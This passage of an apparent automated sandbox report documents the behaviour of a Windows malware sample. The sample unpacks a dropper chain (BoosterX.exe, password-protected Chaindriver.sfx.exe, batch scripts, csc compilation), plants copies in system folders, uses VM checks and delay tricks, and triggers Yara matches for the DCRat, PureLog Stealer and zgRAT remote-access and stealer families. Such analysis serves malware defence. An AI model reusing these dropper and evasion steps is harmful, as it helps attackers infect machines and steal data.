                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeCode function: 4_2_00007FF6C037B110 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,4_2_00007FF6C037B110
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeCode function: 4_2_00007FF6C038FC20 FindFirstFileExA,4_2_00007FF6C038FC20
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B5B110 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,7_2_00007FF720B5B110
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B4407C FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,7_2_00007FF720B4407C
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B6FC20 FindFirstFileExA,7_2_00007FF720B6FC20
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeCode function: 4_2_00007FF6C0381624 VirtualQuery,GetSystemInfo,4_2_00007FF6C0381624
                          Source: C:\Chaindriver.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Chaindriver.exeThread delayed: delay time: 922337203685477
                          Source: C:\Chaindriver.exeThread delayed: delay time: 922337203685477
                          Source: C:\Recovery\Memory Compression.exeThread delayed: delay time: 922337203685477
                          Source: C:\Recovery\Memory Compression.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeThread delayed: delay time: 922337203685477
                          Source: C:\Chaindriver.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeThread delayed: delay time: 922337203685477
                          Source: C:\Chaindriver.exeFile opened: C:\Users\userJump to behavior
                          Source: C:\Chaindriver.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                          Source: C:\Chaindriver.exeFile opened: C:\Users\user\AppDataJump to behavior
                          Source: C:\Chaindriver.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                          Source: C:\Chaindriver.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Chaindriver.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                          Source: Memory Compression.exe, 00000025.00000002.1828796912.0000000012A23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: eEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
                          Source: Memory Compression.exe, 00000025.00000002.1832528116.000000001B2A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlly
                          Source: BoosterX.exe, 00000004.00000002.1672861677.000002A14FAE6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATA
                          Source: Chaindriver.exe, 00000008.00000002.1726550758.0000000000D5A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: Chaindriver.exe, 00000008.00000002.1743974860.000000001BE0B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                          Source: w32tm.exe, 0000002F.00000002.1875107794.000001CB2D4B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll.
                          Source: Memory Compression.exe, 00000025.00000002.1832528116.000000001B36F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                          Source: w32tm.exe, 00000021.00000002.1778436522.0000021A6C407000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]
                          Source: C:\Chaindriver.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: 0_2_00007FF652EEB3CC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF652EEB3CC
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: 0_2_00007FF652EF42D0 GetProcessHeap,0_2_00007FF652EF42D0
                          Source: C:\Chaindriver.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Chaindriver.exeProcess token adjusted: Debug
                          Source: C:\Chaindriver.exeProcess token adjusted: Debug
                          Source: C:\Recovery\Memory Compression.exeProcess token adjusted: Debug
                          Source: C:\Recovery\Memory Compression.exeProcess token adjusted: Debug
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess token adjusted: Debug
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess token adjusted: Debug
                          Source: C:\Chaindriver.exeProcess token adjusted: Debug
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: 0_2_00007FF652EEB3CC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF652EEB3CC
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: 0_2_00007FF652EDCA9C SetUnhandledExceptionFilter,0_2_00007FF652EDCA9C
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: 0_2_00007FF652EDC030 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF652EDC030
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: 0_2_00007FF652EDC8BC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF652EDC8BC
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: 1_2_00007FFE148BFF4C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FFE148BFF4C
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeCode function: 4_2_00007FF6C03832D4 SetUnhandledExceptionFilter,4_2_00007FF6C03832D4
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeCode function: 4_2_00007FF6C0382490 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FF6C0382490
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeCode function: 4_2_00007FF6C0387658 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF6C0387658
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeCode function: 4_2_00007FF6C03830F0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF6C03830F0
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B632D4 SetUnhandledExceptionFilter,7_2_00007FF720B632D4
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B62490 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00007FF720B62490
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B67658 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00007FF720B67658
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B630F0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00007FF720B630F0
                          Source: C:\Chaindriver.exeMemory allocated: page read and write | page guardJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeCode function: 4_2_00007FF6C037B110 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,4_2_00007FF6C037B110
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeProcess created: C:\Users\user\Desktop\t8F7Ic986c.exe "C:\Users\user\Desktop\t8F7Ic986c.exe"Jump to behavior
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe -p1234Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe -p1234Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\1.bat" "Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Chaindriver.sfx.exe Chaindriver.sfx.exe -p1234Jump to behavior
                          Source: C:\Chaindriver.sfx.exeProcess created: C:\Chaindriver.exe "C:\Chaindriver.exe" Jump to behavior
                          Source: C:\Chaindriver.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fvh1uhfy\fvh1uhfy.cmdline"Jump to behavior
                          Source: C:\Chaindriver.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\lrFP7pOB0Z.bat" Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES953C.tmp" "c:\Windows\System32\CSCE25282B3313D430FBB6BBFE2CFE4882.TMP"Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Chaindriver.exe "C:\Chaindriver.exe"
                          Source: C:\Recovery\Memory Compression.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zsJdcY9yPm.bat"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                          Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: 0_2_00007FF652EFA620 cpuid 0_2_00007FF652EFA620
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeCode function: GetLocaleInfoW,GetNumberFormatW,4_2_00007FF6C037A24C
                          Source: C:\Chaindriver.sfx.exeCode function: GetLocaleInfoW,GetNumberFormatW,7_2_00007FF720B5A24C
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75042\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75042\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75042\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75042\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75042\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75042\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75042\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75042\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75042\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75042\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75042\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75042\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75042\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75042\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75042\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75042\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75042\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75042\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75042\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75042\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75042\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75042\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75042\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75042\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75042\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75042\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75042\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75042\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75042\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75042\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeQueries volume information: C:\Users\user\Desktop\t8F7Ic986c.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75042 VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75042 VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75042 VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75042 VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75042\base_library.zip VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75042\unicodedata.pyd VolumeInformationJump to behavior
                          Source: C:\Chaindriver.exeQueries volume information: C:\Chaindriver.exe VolumeInformationJump to behavior
                          Source: C:\Chaindriver.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Chaindriver.exeQueries volume information: C:\Chaindriver.exe VolumeInformation
                          Source: C:\Chaindriver.exeQueries volume information: C:\Chaindriver.exe VolumeInformation
                          Source: C:\Recovery\Memory Compression.exeQueries volume information: C:\Recovery\Memory Compression.exe VolumeInformation
                          Source: C:\Recovery\Memory Compression.exeQueries volume information: C:\Recovery\Memory Compression.exe VolumeInformation
                          Source: C:\Recovery\Memory Compression.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeQueries volume information: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe VolumeInformation
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeQueries volume information: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe VolumeInformation
                          Source: C:\Chaindriver.exeQueries volume information: C:\Chaindriver.exe VolumeInformation
                          Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeQueries volume information: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe VolumeInformation
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: 0_2_00007FF652EDC7A0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF652EDC7A0
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: 0_2_00007FF652EF6B50 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF652EF6B50
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeCode function: 4_2_00007FF6C0365164 GetVersionExW,4_2_00007FF6C0365164
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                          Stealing of Sensitive Information

                          barindex
                          Yara detected DCRat
                          Source: Yara matchFile source: 00000008.00000002.1740441058.0000000012EBC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Chaindriver.exe PID: 7852, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: Memory Compression.exe PID: 6924, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: Chaindriver.exe PID: 7712, type: MEMORYSTR
                          Yara detected PureLog Stealer
                          Source: Yara matchFile source: 8.0.Chaindriver.exe.660000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000008.00000000.1683927613.0000000000662000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000007.00000003.1681625695.0000019CC38A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: C:\Recovery\Memory Compression.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Recovery\NOFqHeDosUIopsPGLT.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Chaindriver.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\Default\Pictures\RuntimeBroker.exe, type: DROPPED
                          Yara detected zgRAT
                          Source: Yara matchFile source: 8.0.Chaindriver.exe.660000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: C:\Recovery\Memory Compression.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Recovery\NOFqHeDosUIopsPGLT.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Chaindriver.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\Default\Pictures\RuntimeBroker.exe, type: DROPPED

                          Remote Access Functionality

                          barindex
                          Yara detected DCRat
                          Source: Yara matchFile source: 00000008.00000002.1740441058.0000000012EBC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Chaindriver.exe PID: 7852, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: Memory Compression.exe PID: 6924, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: Chaindriver.exe PID: 7712, type: MEMORYSTR
                          Yara detected PureLog Stealer
                          Source: Yara matchFile source: 8.0.Chaindriver.exe.660000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000008.00000000.1683927613.0000000000662000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000007.00000003.1681625695.0000019CC38A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
